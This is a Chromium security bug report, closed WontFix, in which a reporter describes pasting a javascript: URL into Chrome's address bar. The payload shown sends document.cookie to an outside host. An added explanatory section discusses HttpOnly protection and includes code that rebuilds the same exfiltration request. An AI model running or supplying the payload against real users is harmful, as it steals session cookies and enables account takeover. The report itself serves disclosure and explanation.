
Issue 874291


Issue metadata

Status: WontFix
Owner: ----
Closed: Aug 15
EstimatedDays: ----
NextAction: ----
OS: ----
Pri: ----
Type: Bug-Security




rXSS, Leveraging URL Bar for DOCUMENT.COOKIE Extraction (GOOGLE CHROME)

Reported by benjamin...@gmail.com, Aug 15

Issue description



VULNERABILITY DETAILS
Using the payload 

javascript':window.location.href= 'http://hckerman.000webhostapp.com/CreateChar.php?CHARS=' + String(document.cookie) + '&url=' + window.location.href

and erasing the first '

Google Chrome will load that as

href="javascript:window.location.href= 'http://hckerman.000webhostapp.com/CreateChar.php?CHARS=' + String(document.cookie) + '&url=' + window.location.href"

or something along those lines.
This method will take social engineering or a small time frame of physical access to the device, but regardless this should not occur. In the attached video you will see the interception of Facebook, mail.google.com, and Twitter cookies.


VERSION
Chrome Version: 68.0.3440.106
Operating System: Windows and Chrome OS (note: potentially Mac, have not attempted)



REPRODUCTION CASE
Link of demonstration and reproduction: https://youtu.be/PNuoxYvEAVE




 
In the video I use a website to host GET requests, and pull the document.cookie value from the URL of the request.

Other browsers will not run "javascript:[commands]" from the URL bar, yet Chrome will. This can potentially yield the loss of confidentiality of data if a user loads this script by inserting the payload in the URL bar at any given website. As you can see in the video, if the payload is put in the URL bar while the user is on Facebook, the associated cookies of Facebook will be remotely sent to a web server. The same goes for Google, Twitter, or any other website. This can be a major issue because it's web-application independent. It's a problem found and rooted in the Chrome browser. Also, as an update, I injected this payload into the Chrome browser for iPhone and it also ran. If you have any questions please feel free to ask.
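The payload above can only exfiltrate what document.cookie returns, and document.cookie never includes cookies set with the HttpOnly attribute; that is the check a practitioner would run on a site's own Set-Cookie headers before worrying about self-XSS of this kind. (The reporter's step of pasting the URL with a leading quote and then deleting it is a workaround for Chrome stripping the "javascript:" scheme from text pasted into the omnibox.) The following is an added example, not code from the report or from Chromium: it parses a few constructed Set-Cookie lines, reconstructs the string document.cookie would expose, lists the cookies HttpOnly keeps out of reach, and builds the same CHARS/url request the payload makes. The collector host and the Set-Cookie lines are placeholders assumed for the example.

```javascript
// Added example (not from the Chromium report): which cookies would the
// javascript: URL payload in the report actually capture? Only cookies that
// are readable through document.cookie, i.e. those set WITHOUT HttpOnly.
// The Set-Cookie lines below are constructed sample input, not real headers.
const SAMPLE_SET_COOKIE = [
  "sessionid=a1b2c3d4; Path=/; Secure; HttpOnly; SameSite=Lax",
  "csrftoken=9f8e7d6c; Path=/; Secure; SameSite=Lax",
  "theme=dark; Path=/",
  "remember_me=1; Max-Age=2592000; HttpOnly",
];

// Parse one Set-Cookie header value into its name/value and the attributes
// relevant here. Attribute names are case-insensitive (RFC 6265).
function parseSetCookie(line) {
  const parts = line.split(";").map((p) => p.trim()).filter(Boolean);
  const eq = parts[0].indexOf("=");
  const name = eq === -1 ? parts[0] : parts[0].slice(0, eq);
  const value = eq === -1 ? "" : parts[0].slice(eq + 1);
  const attrs = parts.slice(1).map((a) => a.toLowerCase());
  return {
    name,
    value,
    httpOnly: attrs.includes("httponly"),
    secure: attrs.includes("secure"),
  };
}

// Reconstruct the string document.cookie would return for these cookies:
// "name=value" pairs joined by "; ", with HttpOnly cookies omitted.
function scriptVisibleCookieString(setCookieLines) {
  return setCookieLines
    .map(parseSetCookie)
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Names of the cookies the payload cannot reach because they are HttpOnly.
function httpOnlyCookieNames(setCookieLines) {
  return setCookieLines
    .map(parseSetCookie)
    .filter((c) => c.httpOnly)
    .map((c) => c.name);
}

// Build the request the report's payload would make, using the same two
// query parameters (CHARS and url). The original payload concatenated
// document.cookie raw; here the values are percent-encoded so the URL is
// well-formed. The collector base URL is a placeholder for this example.
function buildExfilUrl(collectorBase, cookieString, pageUrl) {
  const u = new URL(collectorBase);
  u.searchParams.set("CHARS", cookieString);
  u.searchParams.set("url", pageUrl);
  return u.toString();
}

const visible = scriptVisibleCookieString(SAMPLE_SET_COOKIE);
console.log("document.cookie would expose:", JSON.stringify(visible));
console.log("protected by HttpOnly:", httpOnlyCookieNames(SAMPLE_SET_COOKIE).join(", "));
console.log(
  "payload would request:",
  buildExfilUrl("https://collector.example/CreateChar.php", visible, "https://www.example.com/inbox")
);
```

Run with node; the session cookie and the remember-me cookie never appear in the exfiltrated string because they carry HttpOnly, while the CSRF token and the theme preference do. Marking session cookies HttpOnly does not stop a self-XSS payload from acting on the page in the victim's session, but it does keep the cookie value itself out of the request that reaches the collector.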
Status: WontFix (was: Unconfirmed)
Hi, thanks for the report; however, we do not consider entering JavaScript in the URL bar a vulnerability. You can read more about it at: https://dev.chromium.org/Home/chromium-security/security-faq#TOC-Does-entering-JavaScript:-URLs-in-the-URL-bar-or-running-script-in-the-developer-tools-mean-there-s-an-XSS-vulnerability-
Sorry, I apologize for the inconvenient report. I'll ensure to read the guidelines thoroughly prior to reporting again.
Thank you

Project Member

Comment 4 by sheriffbot@chromium.org, Nov 22

Labels: -Restrict-View-SecurityTeam allpublic
This bug has been closed for more than 14 weeks. Removing security view restrictions.

For more details visit https://www.chromium.org/issue-tracking/autotriage - Your friendly Sheriffbot
